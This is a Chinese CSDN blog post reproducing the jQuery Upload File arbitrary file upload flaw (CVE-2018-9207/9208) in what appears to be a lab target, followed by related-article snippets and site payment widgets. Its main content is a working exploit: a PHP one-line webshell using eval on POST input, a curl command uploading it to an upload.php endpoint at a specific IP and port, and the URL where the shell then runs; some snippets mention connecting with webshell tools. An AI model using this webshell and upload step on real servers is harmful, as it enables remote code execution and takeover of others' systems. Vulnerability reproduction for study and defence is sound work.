【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)

已于 2022-10-21 13:28:01 修改
阅读量828 收藏 1
点赞数 1
分类专栏: 优秀文章 秀秀 文章标签: linux
于 2022-10-21 13:16:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52549196/article/details/127444208
版权
优秀文章 同时被 2 个专栏收录
166 篇文章 53 订阅 ¥9.90 ¥99.00
订阅专栏
秀秀
178 篇文章 2 订阅
订阅专栏
本文详细分析了jQuery Upload File 4.0.2版本中的安全漏洞CVE-2018-9208,该漏洞允许未授权用户上传任意文件,包括可执行的PHP文件,可能导致代码执行风险。jQuery-Picture-Cut插件的upload.php在处理文件上传时存在缺陷,未进行文件类型检查和路径限制。
摘要由CSDN通过智能技术生成

1.php

在这里插入图片描述

<?php eval($_POST[1]);

(CVE-2018-9208)

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。

jQuery Upload File <= 4.0.2 中的任意文件上传

 curl -F "myfile=@1.php" "http://123.58.224.8:41698/jquery-upload-file/php/upload.php"

http://123.58.224.8:41698/jquery-upload-file/php/uploads/1.php
了解本专栏 订阅专栏 解锁全文
????27282
关注
专栏目录
订阅专栏
复现CVE-2020-11022/11023(jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 6080
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
分析CVE-2018-18557与复现
m0_67105288的博客
02-17 557
分析CVE-2018-18557与复现
jquery 文件上传漏洞CVE-2018-9207
ak.Gh0st的博客
10-31 745
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
jquery-picture-cut 任意文件上传CVE-2018-9208
最新发布
qq_23003811的博客
07-16 214
jQuery-Picture-Cut/src/php/upload.php 调用../core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。2、放到kali服务器root目录,执行crul进行上传文件。1、准备好一句话木马fzzf.php。3、使用国蚁剑等工具进行连接。
jquery 文件上传CVE-2018-9207漏洞复现
weixin_42675091的博客
09-03 2749
jquery 文件上传CVE-2018-9207漏洞复现
jquery文件上传(CVE-2018-9207)
m0_65150886的博客
12-29 637
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery Upload File <= 4.0.2 任意文件上传 根目录下/jquery-upload-file。文件phpinfo.php。2.准备好phpinfo.php文件,在文件目录下cmd。4.打开文件位置正常解析php文件。3.通过crul命令上传。1.访问ip:port。
jQuery文件上传漏洞(CVE-2018-9207)
m0_49025459的博客
12-06 822
漏洞描述 jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File
Drupal漏洞复现CVE-2019-6341
weixin_59086772的博客
12-30 2259
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
泛微 E-Office文件上传漏洞复现CVE-2023-2523、CVE-2023-2648)
0xSec
05-23 1万+
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
360提示[高危]使用存在漏洞JQuery版本的解决方法
01-19
今天发现360给我发送了一封邮件,发现网站:使用存在漏洞JQuery版本,黑客可以利用这个漏洞入侵您的网站。 然后到360检测查看了解决办法 但是感觉并没有什么用,而方案二的解决办法又要加群, 博主感觉这是不是360的一个圈套,就看你们跳还是不跳了。 博主这里放出2个解决办法,都能够解决。 第一种:这种只能够瞒着360,但漏洞依然存在,那就是 删除JQ的版本号,360还没那么智能,也只能通过注释信息查询版本号,并不能扫描JQ内容来判断JQ的版本号。 第二种:用最新版本的JQ也可以解决,博主在这里建议用第二种,能够解决JQ漏洞
漏洞复现-jquery-文件上传】vulfocus/jquery-cve_2018_9207
10-07 2074
jquery-文件上传
Drupal第三方库jQuery UI起死回生,多个漏洞影响网站、企业产品等
smellycat000的专栏
01-21 725
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
CVE-2018-9207 jQuery文件上传漏洞复现
LM01的博客
06-04 1692
CVE-2018-9207 jQuery文件上传漏洞复现
jQuery-File-Upload—三个漏洞的故事
热门推荐
一个码农的笔记
01-11 3万+
翻译自:https://blog.detectify.com/2018/12/13/jquery-file-upload-a-tale-of-three-vulnerabilities/ 翻译:聂心明 在github上星个数第二多的JavaScript项目有两个远程命令执行漏洞,并且星数第三多的那个项目可能会通过jQuery-File-Upload任意删掉被上传的文件。后者是有意的行为,我们的安...
jQuery UI的那些坑
纸鸢的博客
05-08 543
contenteditable属性与draggable与resizable同时应用失效问题解决方案 1、添加contenteditable属性时直接销毁draggable和resizable 2、禁用 $("id名").draggable().resizable().click(function(){ $(this).draggable({disabled:false}); $(this).a...
jquery 文件上传CVE-2018-9207
qq_23003811的博客
07-16 204
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery Upload File <= 4.0.2 任意文件上传 根目录下/jquery-upload-file。1、准备好phpinfo.php,放到kali服务器root目录(任意目录,f在上传的目录上执行curl)1、把phpinfo改成一句话木马上传。3、访问地址,返回phpinfo信息。2、使用国蚁剑等工具进行连接。
jQueryjQueryUI内存泄漏问题修复
yuanlanxiaup
11-01 165
1. jQuery的remove带来的内存泄漏修复: 将remove方法内的代码修改为下面代码即可: if ( !selector || jQuery.filter( selector, [ this ] ).length ) { // Prevent memory leaks var item = $(this); var clearItem = $('#clea...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值